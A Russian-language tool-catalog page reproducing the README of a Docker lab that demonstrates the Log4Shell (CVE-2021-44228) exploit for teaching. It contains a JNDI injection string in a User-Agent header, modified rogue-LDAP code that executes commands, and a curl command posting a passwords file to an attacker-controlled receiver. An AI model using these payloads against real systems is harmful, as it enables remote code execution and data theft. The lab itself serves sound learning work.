Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44228-docker-example — Демонстрация эксплуатации CVE-2021-44228 (Log4Shell) на основе Docker, включающая уязвимый Java-сервер, вредоносный LDAP-сервер и эксфильтрацию данных на управляемый атакующим приемник. | Kitploit
Инструменты/GitHubGitHub/dicanio/cve-2021-44228-docker-example
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхОбучение и ОбразованиеЛаборатории и Практика
GitHubdicanio/cve-2021-44228-docker-example

CVE-2021-44228-docker-example

Демонстрация эксплуатации CVE-2021-44228 (Log4Shell) на основе Docker, включающая уязвимый Java-сервер, вредоносный LDAP-сервер и эксфильтрацию данных на управляемый атакующим приемник.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
14 лет назадЕщё не проверено

CVE-2021-44228-docker-example

Простая демонстрация CVE-2021-44228 для передачи данных с уязвимого сервера на веб-сервис, контролируемый атакующим. Все участвующие компоненты запускаются через Docker.

Компоненты

vulnerable-server

Это стандартный Java-сервер, выступающий в роли жертвы. Он работает на:

  • Java 8u111
  • Веб-приложение (Spring Boot 2.6.1)
  • Log4J

Этот сервер УЯЗВИМ при данной конфигурации.

Дополнительная информация:

  • эндпоинт /logging (GET) будет логировать user agent с помощью Log4J
  • /foo/passwords.txt существует (цель атакующего)

Содержимое passwords.txt:

root@kitploit:~
my secret

malicious-receiver

Это стандартный Java-сервер, выступающий в роли сборщика данных атакующего. Он работает на:

  • Java 17
  • Веб-приложение (Spring Boot 2.6.1)

Дополнительная информация:

  • эндпоинт receiver (POST) будет логировать тело запроса

malicious-ldap

Это LDAP-сервер на базе rogue-jndi. Его класс ExportJava был изменён таким образом, чтобы команды, переданные через флаг -c, выполнялись.

root@kitploit:~
public ExportObject() {
    try {
        Runtime.getRuntime().exec(Config.command);
    } catch(Exception e) {
        e.printStackTrace();
    }
}

При запросе от уязвимого сервера он ответит классом, который при инстанцировании выполнит следующую команду:

root@kitploit:~
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt

Это позволит отправить содержимое /foo/passwords.txt на подготовленный эндпоинт вредоносного приёмника.

Использование

  1. Настройте Docker-образы, выполнив:
    root@kitploit:~
    ./build.sh
    
  2. Запустите контейнеры компонентов, выполнив:
    root@kitploit:~
    ./start.sh
    
  3. Активируйте уязвимость, выполнив:
    root@kitploit:~
    curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
    
  4. Проверьте вывод логов вредоносного приёмника, выполнив:
    root@kitploit:~
    docker logs --timestamps docker_malicious-receiver_1
    
    В выводе должно быть содержимое файла passwords.txt сервера.
  5. Остановите контейнеры компонентов, выполнив:
    root@kitploit:~
    ./stop.sh
    
Скачать инструмент